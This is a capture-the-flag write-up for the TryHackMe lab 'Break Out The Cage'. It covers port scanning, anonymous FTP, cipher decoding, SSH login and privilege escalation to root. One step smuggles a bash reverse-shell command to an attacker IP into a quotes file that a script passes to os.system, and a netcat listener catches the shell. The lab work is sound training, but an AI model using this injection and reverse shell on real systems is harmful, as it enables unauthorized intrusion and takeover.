# Break Out The Cage

<figure><img src="https://1261483422-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTAjoMGhyi4qD4wiYqHYf%2Fuploads%2Fo3HwZUpZsSFlo8BDNemq%2FBreak%20Out%20The%20Cage.jpeg?alt=media&#x26;token=076b8fe3-b9d1-47b6-ab0a-5b77542389ec" alt="" width="555"><figcaption></figcaption></figure>

<p align="center"><a href="https://tryhackme.com/room/breakoutthecage1">https://tryhackme.com/room/breakoutthecage1</a></p>

***

## Enumeration

```bash
sudo nmap -p- -sS --min-rate 5000 -Pn -n -vv -oA nmap/BreakOutTheCage 10.67.177.88

PORT   STATE SERVICE REASON
21/tcp open  ftp     syn-ack ttl 62
22/tcp open  ssh     syn-ack ttl 62
80/tcp open  http    syn-ack ttl 62
```

```bash
nmap -p 21,22,80 -sCV -oA nmap/openPorts 10.67.177.88

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:192.168.192.129
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0             396 May 25  2020 dad_tasks
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 dd:fd:88:94:f8:c8:d1:1b:51:e3:7d:f8:1d:dd:82:3e (RSA)
|   256 3e:ba:38:63:2b:8d:1c:68:13:d5:05:ba:7a:ae:d9:3b (ECDSA)
|_  256 c0:a6:a3:64:44:1e:cf:47:5f:85:f6:1f:78:4c:59:d8 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Nicholas Cage Stories
|_http-server-header: Apache/2.4.29 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
```

```bash
ftp 10.67.177.88

Connected to 10.67.177.88.
220 (vsFTPd 3.0.3)
Name (10.67.177.88:melvin): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 0        0             396 May 25  2020 dad_tasks
226 Directory send OK.
ftp> get dad_tasks
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for dad_tasks (396 bytes).
226 Transfer complete.
```

```bash
cat dad_tasks ; echo

UWFwdyBFZWtjbCAtIFB2ciBSTUtQLi4uWFpXIFZXVVIuLi4gVFRJIFhFRi4uLiBMQUEgWlJHUVJPISEhIQpTZncuIEtham5tYiB4c2kgb3d1b3dnZQpGYXouIFRtbCBma2ZyIHFnc2VpayBhZyBvcWVpYngKRWxqd3guIFhpbCBicWkgYWlrbGJ5d3FlClJzZnYuIFp3ZWwgdnZtIGltZWwgc3VtZWJ0IGxxd2RzZmsKWWVqci4gVHFlbmwgVnN3IHN2bnQgInVycXNqZXRwd2JuIGVpbnlqYW11IiB3Zi4KCkl6IGdsd3cgQSB5a2Z0ZWYuLi4uIFFqaHN2Ym91dW9leGNtdndrd3dhdGZsbHh1Z2hoYmJjbXlkaXp3bGtic2lkaXVzY3ds
```

<http://10.67.177.88/>

<figure><img src="https://1261483422-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTAjoMGhyi4qD4wiYqHYf%2Fuploads%2FE02usBd2PR9blqVizKmt%2FScreenshot%202026-03-17%20105541.png?alt=media&#x26;token=f3990359-e554-4665-92be-20dcbf4296d9" alt=""><figcaption></figcaption></figure>

```bash
ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -u http://10.67.177.88/FUZZ -t 100 -ic -c

images                  [Status: 301, Size: 313, Words: 20, Lines: 10, Duration: 176ms]
html                    [Status: 301, Size: 311, Words: 20, Lines: 10, Duration: 178ms]
scripts                 [Status: 301, Size: 314, Words: 20, Lines: 10, Duration: 159ms]
contracts               [Status: 301, Size: 316, Words: 20, Lines: 10, Duration: 182ms]
auditions               [Status: 301, Size: 316, Words: 20, Lines: 10, Duration: 163ms]
```

<http://10.67.177.88/auditions/>

<figure><img src="https://1261483422-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTAjoMGhyi4qD4wiYqHYf%2Fuploads%2FxIbBbqV8xjv2LSmS3Po5%2FScreenshot%202026-03-17%20103334.png?alt=media&#x26;token=abfb9738-51f2-4288-a4d9-bde81e4686dc" alt=""><figcaption></figcaption></figure>

```bash
wget http://10.67.177.88/auditions/must_practice_corrupt_file.mp3
```

```bash
audacity must_practice_corrupt_file.mp3
```

<figure><img src="https://1261483422-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTAjoMGhyi4qD4wiYqHYf%2Fuploads%2F31PpjNOgP8aD4ylyrXaq%2FScreenshot%202026-03-17%20104139.png?alt=media&#x26;token=efee6c5c-12e0-4829-b44e-3654c01be6a3" alt=""><figcaption></figcaption></figure>

<figure><img src="https://1261483422-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FTAjoMGhyi4qD4wiYqHYf%2Fuploads%2FNKd2RoxkhVBNq2U1PdTK%2FScreenshot%202026-03-17%20104839.png?alt=media&#x26;token=2cf667b9-5f16-4333-a6ac-a01649f881da" alt=""><figcaption></figcaption></figure>

```bash
python3 - << 'EOF'
def vigenere_decode(text, key):
    result = []
    key = key.lower()
    ki = 0
    for c in text:
        if c.isalpha():
            shift = ord(key[ki % len(key)]) - ord('a')
            base = ord('A') if c.isupper() else ord('a')
            result.append(chr((ord(c) - base - shift) % 26 + base))
            ki += 1
        else:
            result.append(c)
    return ''.join(result)

import base64
raw = base64.b64decode("UWFwdyBFZWtjbCAtIFB2ciBSTUtQLi4uWFpXIFZXVVIuLi4gVFRJIFhFRi4uLiBMQUEgWlJHUVJPISEhIQpTZncuIEtham5tYiB4c2kgb3d1b3dnZQpGYXouIFRtbCBma2ZyIHFnc2VpayBhZyBvcWVpYngKRWxqd3guIFhpbCBicWkgYWlrbGJ5d3FlClJzZnYuIFp3ZWwgdnZtIGltZWwgc3VtZWJ0IGxxd2RzZmsKWWVqci4gVHFlbmwgVnN3IHN2bnQgInVycXNqZXRwd2JuIGVpbnlqYW11IiB3Zi4KCkl6IGdsd3cgQSB5a2Z0ZWYuLi4uIFFqaHN2Ym91dW9leGNtdndrd3dhdGZsbHh1Z2hoYmJjbXlkaXp3bGtic2lkaXVzY3ds").decode()
print(vigenere_decode(raw, "namelesstwo"))
EOF
Dads Tasks - The RAGE...THE CAGE... THE MAN... THE LEGEND!!!!
One. Revamp the website
Two. Put more quotes in script
Three. Buy bee pesticide
Four. Help him with acting lessons
Five. Teach Dad what "information security" is.

In case I forget.... Mydadisghostrideraintthatcoolnocausehesonfirejokes
```

```bash
ssh weston@10.67.190.113

The authenticity of host '10.67.190.113 (10.67.190.113)' can't be established.
ED25519 key fingerprint is: SHA256:o7pzAxWHDEV8n+uNpDnQ+sjkkBvKP3UVlNw2MpzspBw
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.67.190.113' (ED25519) to the list of known hosts.
** WARNING: connection is not using a post-quantum key exchange algorithm.
** This session may be vulnerable to "store now, decrypt later" attacks.
** The server may need to be upgraded. See https://openssh.com/pq.html
weston@10.67.190.113's password: 
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-101-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue Mar 17 14:03:23 UTC 2026

  System load:  0.16               Processes:           94
  Usage of /:   20.3% of 19.56GB   Users logged in:     0
  Memory usage: 33%                IP address for ens5: 10.67.190.113
  Swap usage:   0%


39 packages can be updated.
0 updates are security updates.


         __________
        /\____;;___\
       | /         /
       `. ())oo() .
        |\(%()*^^()^\
       %| |-%-------|
      % \ | %  ))   |
      %  \|%________|
       %%%%
Last login: Tue May 26 10:58:20 2020 from 192.168.247.1
weston@national-treasure:~$
```

```bash
weston@national-treasure:~$ id

uid=1001(weston) gid=1001(weston) groups=1001(weston),1000(cage)
```

```bash
cat /etc/passwd | grep -v nologin | awk -F ':' '{print $1}'

root
sync
lxd
pollinate
cage
weston
```

## Lateral movement

```bash
find / -writable -not -path "/proc/*" -not -path "/run/*" -not -path "/sys/*" -not -path "/var/*" -not -path "/lib/*" -not -path "/dev/*" -not -path "/snap/*" 2>/dev/null

/tmp
/tmp/.X11-unix
/tmp/.Test-unix
/tmp/.font-unix
/tmp/.ICE-unix
/tmp/.XIM-unix
/home/weston
/home/weston/.cache
/home/weston/.cache/motd.legal-displayed
/home/weston/.gnupg
/home/weston/.gnupg/private-keys-v1.d
/home/weston/.bash_history
/home/weston/.viminfo
/opt/.dads_scripts/.files
/opt/.dads_scripts/.files/.quotes
```

```bash
weston@national-treasure:~$ cd /opt/.dads_scripts
weston@national-treasure:/opt/.dads_scripts$ ls -la
total 16
drwxr-xr-x 3 cage cage 4096 May 26  2020 .
drwxr-xr-x 3 root root 4096 May 25  2020 ..
drwxrwxr-x 2 cage cage 4096 Mar 17 14:27 .files
-rwxr--r-- 1 cage cage  255 May 26  2020 spread_the_quotes.py
```

```bash
weston@national-treasure:/opt/.dads_scripts$ cat spread_the_quotes.py 
#!/usr/bin/env python

#Copyright Weston 2k20 (Dad couldnt write this with all the time in the world!)
import os
import random

lines = open("/opt/.dads_scripts/.files/.quotes").read().splitlines()
quote = random.choice(lines)
os.system("wall " + quote)
```

```bash
nc -lnvp 1111
```

```bash
weston@national-treasure:/opt/.dads_scripts$ echo 'melvin; bash -c "bash -i >& /dev/tcp/192.168.192.129/1111 0>&1"' > /opt/.dads_scripts/.files/.quotes
```

```bash
nc -lnvp 1111
Listening on 0.0.0.0 1111
Connection received on 10.67.190.113 55934
bash: cannot set terminal process group (2100): Inappropriate ioctl for device
bash: no job control in this shell
cage@national-treasure:~$
```

[interactive-shell](https://estebanzarate.gitbook.io/hackache/linux/interactive-shell "mention")

```bash
cage@national-treasure:~$ ls
email_backup  Super_Duper_Checklist
```

## User flag

```bash
cage@national-treasure:~$ cat Super_Duper_Checklist

1 - Increase acting lesson budget by at least 30%
2 - Get Weston to stop wearing eye-liner
3 - Get a new pet octopus
4 - Try and keep current wife
5 - Figure out why Weston has this etched into his desk: THM*******************NG}
```

## Privilege escalation

```bash
cage@national-treasure:~$ cat email_backup/*

From - SeanArcher@BigManAgents.com
To - Cage@nationaltreasure.com

Hey Cage!

There's rumours of a Face/Off sequel, Face/Off 2 - Face On. It's supposedly only in the
planning stages at the moment. I've put a good word in for you, if you're lucky we 
might be able to get you a part of an angry shop keeping or something? Would you be up
for that, the money would be good and it'd look good on your acting CV.

Regards

Sean Archer
From - Cage@nationaltreasure.com
To - SeanArcher@BigManAgents.com

Dear Sean

We've had this discussion before Sean, I want bigger roles, I'm meant for greater things.
Why aren't you finding roles like Batman, The Little Mermaid(I'd make a great Sebastian!),
the new Home Alone film and why oh why Sean, tell me why Sean. Why did I not get a role in the
new fan made Star Wars films?! There was 3 of them! 3 Sean! I mean yes they were terrible films.
I could of made them great... great Sean.... I think you're missing my true potential.

On a much lighter note thank you for helping me set up my home server, Weston helped too, but
not overally greatly. I gave him some smaller jobs. Whats your username on here? Root?

Yours

Cage
From - Cage@nationaltreasure.com
To - Weston@nationaltreasure.com

Hey Son

Buddy, Sean left a note on his desk with some really strange writing on it. I quickly wrote
down what it said. Could you look into it please? I think it could be something to do with his
account on here. I want to know what he's hiding from me... I might need a new agent. Pretty
sure he's out to get me. The note said:

haiinspsyanileph

The guy also seems obsessed with my face lately. He came him wearing a mask of my face...
was rather odd. Imagine wearing his ugly face.... I wouldnt be able to FACE that!! 
hahahahahahahahahahahahahahahaahah get it Weston! FACE THAT!!!! hahahahahahahhaha
ahahahhahaha. Ahhh Face it... he's just odd. 

Regards

The Legend - Cage
```

```python
def vigenere_decode(text, key):
    result = []
    key = key.lower()
    ki = 0
    for c in text:
        if c.isalpha():
            shift = ord(key[ki % len(key)]) - ord('a')
            base = ord('A') if c.isupper() else ord('a')
            result.append(chr((ord(c) - base - shift) % 26 + base))
            ki += 1
        else:
            result.append(c)
    return ''.join(result)

print(vigenere_decode("haiinspsyanileph", "face"))
```

```bash
python3 decode.py
cageisnotalegend
```

```bash
cage@national-treasure:~$ su root

Password: 
root@national-treasure:/home/cage# cd
root@national-treasure:~# ls
email_backup
```

## Root flag

```bash
root@national-treasure:~# cat email_backup/*
From - SeanArcher@BigManAgents.com
To - master@ActorsGuild.com

Good Evening Master

My control over Cage is becoming stronger, I've been casting him into worse and worse roles.
Eventually the whole world will see who Cage really is! Our masterplan is coming together
master, I'm in your debt.

Thank you

Sean Archer
From - master@ActorsGuild.com
To - SeanArcher@BigManAgents.com

Dear Sean

I'm very pleased to here that Sean, you are a good disciple. Your power over him has become
strong... so strong that I feel the power to promote you from disciple to crony. I hope you
don't abuse your new found strength. To ascend yourself to this level please use this code:

THM*******************************M3}

Thank you

Sean Archer
```

***

## Server misconfigurations

```bash
root@national-treasure:~# sed -n '153,180p' /etc/apache2/apache2.conf

# Sets the default security model of the Apache2 HTTPD server. It does
# not allow access to the root filesystem outside of /usr/share and /var/www.
# The former is used by web applications packaged in Debian,
# the latter may be used for local directories served by the web server. If
# your system is serving content from a sub-directory in /srv you must allow
# access here, or in any related virtual host.
<Directory />
Options FollowSymLinks
AllowOverride None
Require all denied
</Directory>
	
<Directory /usr/share>
AllowOverride None
Require all granted
</Directory>
	
<Directory /var/www/>
Options Indexes FollowSymLinks
AllowOverride None
Require all granted
</Directory>
	
#<Directory /srv/>
#	Options Indexes FollowSymLinks
#	AllowOverride None
#	Require all granted
#</Directory>
```